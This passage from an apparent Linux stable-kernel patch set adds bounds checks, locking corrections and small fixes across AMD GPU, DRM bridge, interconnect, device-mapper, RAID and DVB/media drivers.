++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1266,7 +1266,6 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
+-bool amdgpu_sg_display_supported(struct amdgpu_device *adev);
+ bool amdgpu_device_pcie_dynamic_switching_supported(void);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
+ bool amdgpu_device_aspm_support_quirk(void);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index 02a112d00d413..4624160315648 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -120,7 +120,6 @@ static int amdgpu_cs_p1_user_fence(struct amdgpu_cs_parser *p,
+ 	struct drm_gem_object *gobj;
+ 	struct amdgpu_bo *bo;
+ 	unsigned long size;
+-	int r;
+ 
+ 	gobj = drm_gem_object_lookup(p->filp, data->handle);
+ 	if (gobj == NULL)
+@@ -132,23 +131,14 @@ static int amdgpu_cs_p1_user_fence(struct amdgpu_cs_parser *p,
+ 	drm_gem_object_put(gobj);
+ 
+ 	size = amdgpu_bo_size(bo);
+-	if (size != PAGE_SIZE || (data->offset + 8) > size) {
+-		r = -EINVAL;
+-		goto error_unref;
+-	}
++	if (size != PAGE_SIZE || data->offset > (size - 8))
++		return -EINVAL;
+ 
+-	if (amdgpu_ttm_tt_get_usermm(bo->tbo.ttm)) {
+-		r = -EINVAL;
+-		goto error_unref;
+-	}
++	if (amdgpu_ttm_tt_get_usermm(bo->tbo.ttm))
++		return -EINVAL;
+ 
+ 	*offset = data->offset;
+-
+ 	return 0;
+-
+-error_unref:
+-	amdgpu_bo_unref(&bo);
+-	return r;
+ }
+ 
+ static int amdgpu_cs_p1_bo_handles(struct amdgpu_cs_parser *p,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 9aac9e755609d..5f5999cea7d2c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1336,32 +1336,6 @@ bool amdgpu_device_need_post(struct amdgpu_device *adev)
+ 	return true;
+ }
+ 
+-/*
+- * On APUs with >= 64GB white flickering has been observed w/ SG enabled.
+- * Disable S/G on such systems until we have a proper fix.
+- * https://gitlab.freedesktop.org/drm/amd/-/issues/2354
+- * https://gitlab.freedesktop.org/drm/amd/-/issues/2735
+- */
+-bool amdgpu_sg_display_supported(struct amdgpu_device *adev)
+-{
+-	switch (amdgpu_sg_display) {
+-	case -1:
+-		break;
+-	case 0:
+-		return false;
+-	case 1:
+-		return true;
+-	default:
+-		return false;
+-	}
+-	if ((totalram_pages() << (PAGE_SHIFT - 10)) +
+-	    (adev->gmc.real_vram_size / 1024) >= 64000000) {
+-		DRM_WARN("Disabling S/G due to >=64GB RAM\n");
+-		return false;
+-	}
+-	return true;
+-}
+-
+ /*
+  * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
+  * speed switching. Until we have confirmation from Intel that a specific host
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index c8e562dcd99d0..18274ff5082ad 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1265,11 +1265,15 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 
+ 	pt_base = amdgpu_gmc_pd_addr(adev->gart.bo);
+ 
+-	page_table_start.high_part = (u32)(adev->gmc.gart_start >> 44) & 0xF;
+-	page_table_start.low_part = (u32)(adev->gmc.gart_start >> 12);
+-	page_table_end.high_part = (u32)(adev->gmc.gart_end >> 44) & 0xF;
+-	page_table_end.low_part = (u32)(adev->gmc.gart_end >> 12);
+-	page_table_base.high_part = upper_32_bits(pt_base) & 0xF;
++	page_table_start.high_part = upper_32_bits(adev->gmc.gart_start >>
++						   AMDGPU_GPU_PAGE_SHIFT);
++	page_table_start.low_part = lower_32_bits(adev->gmc.gart_start >>
++						  AMDGPU_GPU_PAGE_SHIFT);
++	page_table_end.high_part = upper_32_bits(adev->gmc.gart_end >>
++						 AMDGPU_GPU_PAGE_SHIFT);
++	page_table_end.low_part = lower_32_bits(adev->gmc.gart_end >>
++						AMDGPU_GPU_PAGE_SHIFT);
++	page_table_base.high_part = upper_32_bits(pt_base);
+ 	page_table_base.low_part = lower_32_bits(pt_base);
+ 
+ 	pa_config->system_aperture.start_addr = (uint64_t)logical_addr_low << 18;
+@@ -1634,8 +1638,9 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 		}
+ 		break;
+ 	}
+-	if (init_data.flags.gpu_vm_support)
+-		init_data.flags.gpu_vm_support = amdgpu_sg_display_supported(adev);
++	if (init_data.flags.gpu_vm_support &&
++	    (amdgpu_sg_display == 0))
++		init_data.flags.gpu_vm_support = false;
+ 
+ 	if (init_data.flags.gpu_vm_support)
+ 		adev->mode_info.gpu_vm_support = true;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index ffbb739d85b69..8496ff4a25e35 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -290,7 +290,8 @@ static void dccg32_set_dpstreamclk(
+ 	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
+ 
+ 	/* set the dtbclk_p source */
+-	dccg32_set_dtbclk_p_src(dccg, src, otg_inst);
++	/* always program refclk as DTBCLK. No use-case expected to require DPREFCLK as refclk */
++	dccg32_set_dtbclk_p_src(dccg, DTBCLK0, otg_inst);
+ 
+ 	/* enabled to select one of the DTBCLKs for pipe */
+ 	switch (dp_hpo_inst) {
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+index ebc04b72b284b..9c84561ff3bc4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+@@ -4133,7 +4133,9 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				}
+ 				if (v->OutputFormat[k] == dm_420 && v->HActive[k] > DCN31_MAX_FMT_420_BUFFER_WIDTH
+ 						&& v->ODMCombineEnablePerState[i][k] != dm_odm_combine_mode_4to1) {
+-					if (v->HActive[k] / 2 > DCN31_MAX_FMT_420_BUFFER_WIDTH) {
++					if (v->Output[k] == dm_hdmi) {
++						FMTBufferExceeded = true;
++					} else if (v->HActive[k] / 2 > DCN31_MAX_FMT_420_BUFFER_WIDTH) {
+ 						v->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_4to1;
+ 						v->PlaneRequiredDISPCLK = v->PlaneRequiredDISPCLKWithODMCombine4To1;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+index 4998b211ccac7..5b47ccde64241 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+@@ -4225,7 +4225,9 @@ void dml314_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_
+ 				}
+ 				if (v->OutputFormat[k] == dm_420 && v->HActive[k] > DCN314_MAX_FMT_420_BUFFER_WIDTH
+ 						&& v->ODMCombineEnablePerState[i][k] != dm_odm_combine_mode_4to1) {
+-					if (v->HActive[k] / 2 > DCN314_MAX_FMT_420_BUFFER_WIDTH) {
++					if (v->Output[k] == dm_hdmi) {
++						FMTBufferExceeded = true;
++					} else if (v->HActive[k] / 2 > DCN314_MAX_FMT_420_BUFFER_WIDTH) {
+ 						v->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_4to1;
+ 						v->PlaneRequiredDISPCLK = v->PlaneRequiredDISPCLKWithODMCombine4To1;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+index b53feeaf5cf11..23e4be2ad63f9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+@@ -3454,6 +3454,7 @@ bool dml32_CalculatePrefetchSchedule(
+ 	double TimeForFetchingMetaPTE = 0;
+ 	double TimeForFetchingRowInVBlank = 0;
+ 	double LinesToRequestPrefetchPixelData = 0;
++	double LinesForPrefetchBandwidth = 0;
+ 	unsigned int HostVMDynamicLevelsTrips;
+ 	double  trip_to_mem;
+ 	double  Tvm_trips;
+@@ -3883,11 +3884,15 @@ bool dml32_CalculatePrefetchSchedule(
+ 			TimeForFetchingMetaPTE = Tvm_oto;
+ 			TimeForFetchingRowInVBlank = Tr0_oto;
+ 			*PrefetchBandwidth = prefetch_bw_oto;
++			/* Clamp to oto for bandwidth calculation */
++			LinesForPrefetchBandwidth = dst_y_prefetch_oto;
+ 		} else {
+ 			*DestinationLinesForPrefetch = dst_y_prefetch_equ;
+ 			TimeForFetchingMetaPTE = Tvm_equ;
+ 			TimeForFetchingRowInVBlank = Tr0_equ;
+ 			*PrefetchBandwidth = prefetch_bw_equ;
++			/* Clamp to equ for bandwidth calculation */
++			LinesForPrefetchBandwidth = dst_y_prefetch_equ;
+ 		}
+ 
+ 		*DestinationLinesToRequestVMInVBlank = dml_ceil(4.0 * TimeForFetchingMetaPTE / LineTime, 1.0) / 4.0;
+@@ -3895,7 +3900,7 @@ bool dml32_CalculatePrefetchSchedule(
+ 		*DestinationLinesToRequestRowInVBlank =
+ 				dml_ceil(4.0 * TimeForFetchingRowInVBlank / LineTime, 1.0) / 4.0;
+ 
+-		LinesToRequestPrefetchPixelData = *DestinationLinesForPrefetch -
++		LinesToRequestPrefetchPixelData = LinesForPrefetchBandwidth -
+ 				*DestinationLinesToRequestVMInVBlank - 2 * *DestinationLinesToRequestRowInVBlank;
+ 
+ #ifdef __DML_VBA_DEBUG__
+diff --git a/drivers/gpu/drm/bridge/tc358762.c b/drivers/gpu/drm/bridge/tc358762.c
+index 7f4fce1aa9988..8db981e7759b9 100644
+--- a/drivers/gpu/drm/bridge/tc358762.c
++++ b/drivers/gpu/drm/bridge/tc358762.c
+@@ -216,7 +216,7 @@ static int tc358762_probe(struct mipi_dsi_device *dsi)
+ 	dsi->lanes = 1;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_SYNC_PULSE |
+-			  MIPI_DSI_MODE_LPM;
++			  MIPI_DSI_MODE_LPM | MIPI_DSI_MODE_VIDEO_HSE;
+ 
+ 	ret = tc358762_parse_dt(ctx);
+ 	if (ret < 0)
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index 739e0d40cca61..5ed77e3361fd7 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -231,6 +231,7 @@ static const struct edid_quirk {
+ 
+ 	/* OSVR HDK and HDK2 VR Headsets */
+ 	EDID_QUIRK('S', 'V', 'R', 0x1019, EDID_QUIRK_NON_DESKTOP),
++	EDID_QUIRK('A', 'U', 'O', 0x1111, EDID_QUIRK_NON_DESKTOP),
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_crtc.c b/drivers/gpu/drm/exynos/exynos_drm_crtc.c
+index 4153f302de7c4..d19e796c20613 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_crtc.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_crtc.c
+@@ -39,13 +39,12 @@ static void exynos_drm_crtc_atomic_disable(struct drm_crtc *crtc,
+ 	if (exynos_crtc->ops->atomic_disable)
+ 		exynos_crtc->ops->atomic_disable(exynos_crtc);
+ 
++	spin_lock_irq(&crtc->dev->event_lock);
+ 	if (crtc->state->event && !crtc->state->active) {
+-		spin_lock_irq(&crtc->dev->event_lock);
+ 		drm_crtc_send_vblank_event(crtc, crtc->state->event);
+-		spin_unlock_irq(&crtc->dev->event_lock);
+-
+ 		crtc->state->event = NULL;
+ 	}
++	spin_unlock_irq(&crtc->dev->event_lock);
+ }
+ 
+ static int exynos_crtc_atomic_check(struct drm_crtc *crtc,
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 4c249939a6c3b..395a190274cfb 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -847,7 +847,7 @@ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+ 		u32 phy_status = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3628) &
+ 				 AUX_RX_PHY_STATE_AUX_TX_P0_MASK;
+ 		if (phy_status != AUX_RX_PHY_STATE_AUX_TX_P0_RX_IDLE) {
+-			drm_err(mtk_dp->drm_dev,
++			dev_err(mtk_dp->dev,
+ 				"AUX Rx Aux hang, need SW reset\n");
+ 			return -EIO;
+ 		}
+@@ -2062,7 +2062,7 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		is_read = true;
+ 		break;
+ 	default:
+-		drm_err(mtk_aux->drm_dev, "invalid aux cmd = %d\n",
++		dev_err(mtk_dp->dev, "invalid aux cmd = %d\n",
+ 			msg->request);
+ 		ret = -EINVAL;
+ 		goto err;
+@@ -2078,7 +2078,7 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 					     to_access, &msg->reply);
+ 
+ 		if (ret) {
+-			drm_info(mtk_dp->drm_dev,
++			dev_info(mtk_dp->dev,
+ 				 "Failed to do AUX transfer: %d\n", ret);
+ 			goto err;
+ 		}
+diff --git a/drivers/gpu/drm/tiny/gm12u320.c b/drivers/gpu/drm/tiny/gm12u320.c
+index 7441d992a5d7a..8b0a9059d3fdd 100644
+--- a/drivers/gpu/drm/tiny/gm12u320.c
++++ b/drivers/gpu/drm/tiny/gm12u320.c
+@@ -69,10 +69,10 @@ MODULE_PARM_DESC(eco_mode, "Turn on Eco mode (less bright, more silent)");
+ #define READ_STATUS_SIZE		13
+ #define MISC_VALUE_SIZE			4
+ 
+-#define CMD_TIMEOUT			msecs_to_jiffies(200)
+-#define DATA_TIMEOUT			msecs_to_jiffies(1000)
+-#define IDLE_TIMEOUT			msecs_to_jiffies(2000)
+-#define FIRST_FRAME_TIMEOUT		msecs_to_jiffies(2000)
++#define CMD_TIMEOUT			200
++#define DATA_TIMEOUT			1000
++#define IDLE_TIMEOUT			2000
++#define FIRST_FRAME_TIMEOUT		2000
+ 
+ #define MISC_REQ_GET_SET_ECO_A		0xff
+ #define MISC_REQ_GET_SET_ECO_B		0x35
+@@ -388,7 +388,7 @@ static void gm12u320_fb_update_work(struct work_struct *work)
+ 	 * switches back to showing its logo.
+ 	 */
+ 	queue_delayed_work(system_long_wq, &gm12u320->fb_update.work,
+-			   IDLE_TIMEOUT);
++			   msecs_to_jiffies(IDLE_TIMEOUT));
+ 
+ 	return;
+ err:
+diff --git a/drivers/i2c/busses/i2c-aspeed.c b/drivers/i2c/busses/i2c-aspeed.c
+index c64c381b69b7f..866c52afb8b0a 100644
+--- a/drivers/i2c/busses/i2c-aspeed.c
++++ b/drivers/i2c/busses/i2c-aspeed.c
+@@ -698,13 +698,16 @@ static int aspeed_i2c_master_xfer(struct i2c_adapter *adap,
+ 
+ 	if (time_left == 0) {
+ 		/*
+-		 * If timed out and bus is still busy in a multi master
+-		 * environment, attempt recovery at here.
++		 * In a multi-master setup, if a timeout occurs, attempt
++		 * recovery. But if the bus is idle, we still need to reset the
++		 * i2c controller to clear the remaining interrupts.
+ 		 */
+ 		if (bus->multi_master &&
+ 		    (readl(bus->base + ASPEED_I2C_CMD_REG) &
+ 		     ASPEED_I2CD_BUS_BUSY_STS))
+ 			aspeed_i2c_recover_bus(bus);
++		else
++			aspeed_i2c_reset(bus);
+ 
+ 		/*
+ 		 * If timed out and the state is still pending, drop the pending
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index cfa52c6369d05..e4b2d9ef61b4d 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -29,6 +29,7 @@ static LIST_HEAD(icc_providers);
+ static int providers_count;
+ static bool synced_state;
+ static DEFINE_MUTEX(icc_lock);
++static DEFINE_MUTEX(icc_bw_lock);
+ static struct dentry *icc_debugfs_dir;
+ 
+ static void icc_summary_show_one(struct seq_file *s, struct icc_node *n)
+@@ -632,7 +633,7 @@ int icc_set_bw(struct icc_path *path, u32 avg_bw, u32 peak_bw)
+ 	if (WARN_ON(IS_ERR(path) || !path->num_nodes))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&icc_lock);
++	mutex_lock(&icc_bw_lock);
+ 
+ 	old_avg = path->reqs[0].avg_bw;
+ 	old_peak = path->reqs[0].peak_bw;
+@@ -664,7 +665,7 @@ int icc_set_bw(struct icc_path *path, u32 avg_bw, u32 peak_bw)
+ 		apply_constraints(path);
+ 	}
+ 
+-	mutex_unlock(&icc_lock);
++	mutex_unlock(&icc_bw_lock);
+ 
+ 	trace_icc_set_bw_end(path, ret);
+ 
+@@ -967,6 +968,7 @@ void icc_node_add(struct icc_node *node, struct icc_provider *provider)
+ 		return;
+ 
+ 	mutex_lock(&icc_lock);
++	mutex_lock(&icc_bw_lock);
+ 
+ 	node->provider = provider;
+ 	list_add_tail(&node->node_list, &provider->nodes);
+@@ -992,6 +994,7 @@ void icc_node_add(struct icc_node *node, struct icc_provider *provider)
+ 	node->avg_bw = 0;
+ 	node->peak_bw = 0;
+ 
++	mutex_unlock(&icc_bw_lock);
+ 	mutex_unlock(&icc_lock);
+ }
+ EXPORT_SYMBOL_GPL(icc_node_add);
+@@ -1129,6 +1132,7 @@ void icc_sync_state(struct device *dev)
+ 		return;
+ 
+ 	mutex_lock(&icc_lock);
++	mutex_lock(&icc_bw_lock);
+ 	synced_state = true;
+ 	list_for_each_entry(p, &icc_providers, provider_list) {
+ 		dev_dbg(p->dev, "interconnect provider is in synced state\n");
+@@ -1141,13 +1145,21 @@ void icc_sync_state(struct device *dev)
+ 			}
+ 		}
+ 	}
++	mutex_unlock(&icc_bw_lock);
+ 	mutex_unlock(&icc_lock);
+ }
+ EXPORT_SYMBOL_GPL(icc_sync_state);
+ 
+ static int __init icc_init(void)
+ {
+-	struct device_node *root = of_find_node_by_path("/");
++	struct device_node *root;
++
++	/* Teach lockdep about lock ordering wrt. shrinker: */
++	fs_reclaim_acquire(GFP_KERNEL);
++	might_lock(&icc_bw_lock);
++	fs_reclaim_release(GFP_KERNEL);
++
++	root = of_find_node_by_path("/");
+ 
+ 	providers_count = of_count_icc_providers(root);
+ 	of_node_put(root);
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index acf7e7551c941..0ec85d159bcde 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -707,24 +707,6 @@ static void dm_put_live_table_fast(struct mapped_device *md) __releases(RCU)
+ 	rcu_read_unlock();
+ }
+ 
+-static inline struct dm_table *dm_get_live_table_bio(struct mapped_device *md,
+-					int *srcu_idx, blk_opf_t bio_opf)
+-{
+-	if (bio_opf & REQ_NOWAIT)
+-		return dm_get_live_table_fast(md);
+-	else
+-		return dm_get_live_table(md, srcu_idx);
+-}
+-
+-static inline void dm_put_live_table_bio(struct mapped_device *md, int srcu_idx,
+-					 blk_opf_t bio_opf)
+-{
+-	if (bio_opf & REQ_NOWAIT)
+-		dm_put_live_table_fast(md);
+-	else
+-		dm_put_live_table(md, srcu_idx);
+-}
+-
+ static char *_dm_claim_ptr = "I belong to device-mapper";
+ 
+ /*
+@@ -1805,9 +1787,8 @@ static void dm_submit_bio(struct bio *bio)
+ 	struct mapped_device *md = bio->bi_bdev->bd_disk->private_data;
+ 	int srcu_idx;
+ 	struct dm_table *map;
+-	blk_opf_t bio_opf = bio->bi_opf;
+ 
+-	map = dm_get_live_table_bio(md, &srcu_idx, bio_opf);
++	map = dm_get_live_table(md, &srcu_idx);
+ 
+ 	/* If suspended, or map not yet available, queue this IO for later */
+ 	if (unlikely(test_bit(DMF_BLOCK_IO_FOR_SUSPEND, &md->flags)) ||
+@@ -1823,7 +1804,7 @@ static void dm_submit_bio(struct bio *bio)
+ 
+ 	dm_split_and_process_bio(md, map, bio);
+ out:
+-	dm_put_live_table_bio(md, srcu_idx, bio_opf);
++	dm_put_live_table(md, srcu_idx);
+ }
+ 
+ static bool dm_poll_dm_io(struct dm_io *io, struct io_comp_batch *iob,
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 86b2acfba1a7f..e87507d29895e 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -8228,7 +8228,7 @@ static void *md_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ 	spin_unlock(&all_mddevs_lock);
+ 
+ 	if (to_put)
+-		mddev_put(mddev);
++		mddev_put(to_put);
+ 	return next_mddev;
+ 
+ }
+diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
+index ac64c587191b9..30f906a67def4 100644
+--- a/drivers/md/raid1.c
++++ b/drivers/md/raid1.c
+@@ -1828,6 +1828,9 @@ static int raid1_remove_disk(struct mddev *mddev, struct md_rdev *rdev)
+ 	int number = rdev->raid_disk;
+ 	struct raid1_info *p = conf->mirrors + number;
+ 
++	if (unlikely(number >= conf->raid_disks))
++		goto abort;
++
+ 	if (rdev != p->rdev)
+ 		p = conf->mirrors + conf->raid_disks + number;
+ 
+diff --git a/drivers/media/pci/cx23885/cx23885-video.c b/drivers/media/pci/cx23885/cx23885-video.c
+index 671fc0588e431..9af2c5596121c 100644
+--- a/drivers/media/pci/cx23885/cx23885-video.c
++++ b/drivers/media/pci/cx23885/cx23885-video.c
+@@ -413,7 +413,7 @@ static int buffer_prepare(struct vb2_buffer *vb)
+ 				dev->height >> 1);
+ 		break;
+ 	default:
+-		BUG();
++		return -EINVAL; /* should not happen */
+ 	}
+ 	dprintk(2, "[%p/%d] buffer_init - %dx%d %dbpp 0x%08x - dma=0x%08lx\n",
+ 		buf, buf->vb.vb2_buf.index,
+diff --git a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+index 3b76a9d0383a8..1bbe58b24d99d 100644
+--- a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
++++ b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+@@ -354,7 +354,7 @@ static int cio2_hw_init(struct cio2_device *cio2, struct cio2_queue *q)
+ 	void __iomem *const base = cio2->base;
+ 	u8 lanes, csi2bus = q->csi2.port;
+ 	u8 sensor_vc = SENSOR_VIR_CH_DFLT;
+-	struct cio2_csi2_timing timing;
++	struct cio2_csi2_timing timing = { 0 };
+ 	int i, r;
+ 
+ 	fmt = cio2_find_format(NULL, &q->subdev_fmt.code);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
+index 7bc05f42a23c1..9a3f46c1f6ba3 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
+@@ -775,11 +775,13 @@ static int mdp_get_subsys_id(struct device *dev, struct device_node *node,
+ 	ret = cmdq_dev_get_client_reg(&comp_pdev->dev, &cmdq_reg, index);
+ 	if (ret != 0) {
+ 		dev_err(&comp_pdev->dev, "cmdq_dev_get_subsys fail!\n");
++		put_device(&comp_pdev->dev);
+ 		return -EINVAL;
+ 	}
+ 
+ 	comp->subsys_id = cmdq_reg.subsys;
+ 	dev_dbg(&comp_pdev->dev, "subsys id=%d\n", cmdq_reg.subsys);
++	put_device(&comp_pdev->dev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/tuners/qt1010.c b/drivers/media/tuners/qt1010.c
+index 60931367b82ca..48fc79cd40273 100644
+--- a/drivers/media/tuners/qt1010.c
++++ b/drivers/media/tuners/qt1010.c
+@@ -345,11 +345,12 @@ static int qt1010_init(struct dvb_frontend *fe)
+ 			else
+ 				valptr = &tmpval;
+ 
+-			BUG_ON(i >= ARRAY_SIZE(i2c_data) - 1);
+-
+-			err = qt1010_init_meas1(priv, i2c_data[i+1].reg,
+-						i2c_data[i].reg,
+-						i2c_data[i].val, valptr);
++			if (i >= ARRAY_SIZE(i2c_data) - 1)
++				err = -EIO;
++			else
++				err = qt1010_init_meas1(priv, i2c_data[i + 1].reg,
++							i2c_data[i].reg,
++							i2c_data[i].val, valptr);
+ 			i++;
+ 			break;
+ 		}
+diff --git a/drivers/media/usb/dvb-usb-v2/af9035.c b/drivers/media/usb/dvb-usb-v2/af9035.c
+index 1e9c8d01523be..cd6f5374414d4 100644
+--- a/drivers/media/usb/dvb-usb-v2/af9035.c
++++ b/drivers/media/usb/dvb-usb-v2/af9035.c
+@@ -270,6 +270,7 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 	struct dvb_usb_device *d = i2c_get_adapdata(adap);
+ 	struct state *state = d_to_priv(d);
+ 	int ret;
++	u32 reg;
+ 
+ 	if (mutex_lock_interruptible(&d->i2c_mutex) < 0)
+ 		return -EAGAIN;
+@@ -322,8 +323,10 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 			ret = -EOPNOTSUPP;
+ 		} else if ((msg[0].addr == state->af9033_i2c_addr[0]) ||
+ 			   (msg[0].addr == state->af9033_i2c_addr[1])) {
++			if (msg[0].len < 3 || msg[1].len < 1)
++				return -EOPNOTSUPP;
+ 			/* demod access via firmware interface */
+-			u32 reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
++			reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
+ 					msg[0].buf[2];
+ 
+ 			if (msg[0].addr == state->af9033_i2c_addr[1])
+@@ -381,17 +384,16 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 			ret = -EOPNOTSUPP;
+ 		} else if ((msg[0].addr == state->af9033_i2c_addr[0]) ||
+ 			   (msg[0].addr == state->af9033_i2c_addr[1])) {
++			if (msg[0].len < 3)
++				return -EOPNOTSUPP;
+ 			/* demod access via firmware interface */
+-			u32 reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
++			reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
+ 					msg[0].buf[2];
+ 
+ 			if (msg[0].addr == state->af9033_i2c_addr[1])
+ 				reg |= 0x100000;
+ 
+-			ret = (msg[0].len >= 3) ? af9035_wr_regs(d, reg,
+-							         &msg[0].buf[3],
+-							         msg[0].len - 3)
+-					        : -EOPNOTSUPP;
++			ret = af9035_wr_regs(d, reg, &msg[0].buf[3], msg[0].len - 3);
+ 		} else {
+ 			/* I2C write */
+ 			u8 buf[MAX_XFER_SIZE];
+diff --git a/drivers/media/usb/dvb-usb-v2/anysee.c b/drivers/media/usb/dvb-usb-v2/anysee.c
+index aa45b5d263f6b..a1235d0cce92f 100644
+--- a/drivers/media/usb/dvb-usb-v2/anysee.c
++++ b/drivers/media/usb/dvb-usb-v2/anysee.c
+@@ -202,7 +202,7 @@ static int anysee_master_xfer(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 
+ 	while (i < num) {
+ 		if (num > i + 1 && (msg[i+1].flags & I2C_M_RD)) {
+-			if (msg[i].len > 2 || msg[i+1].len > 60) {
++			if (msg[i].len != 2 || msg[i + 1].len > 60) {
+ 				ret = -EOPNOTSUPP;
+ 				break;
+ 			}
+diff --git a/drivers/media/usb/dvb-usb-v2/az6007.c b/drivers/media/usb/dvb-usb-v2/az6007.c
+index 7524c90f5da61..6cbfe75791c21 100644
+--- a/drivers/media/usb/dvb-usb-v2/az6007.c
++++ b/drivers/media/usb/dvb-usb-v2/az6007.c
+@@ -788,6 +788,10 @@ static int az6007_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msgs[],
+ 			if (az6007_xfer_debug)
+ 				printk(KERN_DEBUG "az6007: I2C W addr=0x%x len=%d\n",
+ 				       addr, msgs[i].len);
++			if (msgs[i].len < 1) {
++				ret = -EIO;
++				goto err;
++			}
+ 			req = AZ6007_I2C_WR;
+ 			index = msgs[i].buf[0];
+ 			value = addr | (1 << 8);
+@@ -802,6 +806,10 @@ static int az6007_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msgs[],
+ 			if (az6007_xfer_debug)
+ 				printk(KERN_DEBUG "az6007: I2C R addr=0x%x len=%d\n",
+ 				       addr, msgs[i].len);
++			if (msgs[i].len < 1) {
++				ret = -EIO;
++				goto err;
++			}
+ 			req = AZ6007_I2C_RD;
